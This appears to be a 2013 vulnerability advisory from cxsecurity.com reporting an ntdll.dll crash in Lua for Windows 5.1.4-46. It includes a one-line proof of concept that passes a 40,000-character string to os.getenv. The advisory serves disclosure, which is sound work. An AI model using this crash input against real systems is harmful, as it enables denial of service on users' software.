Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash

2013.02.14
Credit: DevilTeam
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Lua for Windows (LfW) V5.1.4-46 => os.getenv ntdll.dll Crash found by: devilteam.pl contact: info@devilteam.pl ==================================================================== Overview Lua for Windows is a 'batteries included environment' for the Lua scripting language on Windows. Lua for Windows (LfW) combines Lua binaries, Lua libraries with a Lua-capable editor in a single install package for the Microsoft Windows operating system. LfW contains everything you need to write, run and debug Lua scripts on Windows. A wide variety of libraries and examples are included that are ready to use with Microsoft Windows. LfW runs on Windows 2000 and newer versions of Windows. Lua and its associated libraries are also available for other operating systems, so most scripts will be automatically cross-platform. Download: http://code.google.com/p/luaforwindows/downloads/list ==================================================================== PoC: dt.lua (1 line): os.getenv(string.rep("A", 40000)) ==================================================================== greetz: cxsec.org CXsecurity

References:

http://code.google.com/p/luaforwindows/downloads/list


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top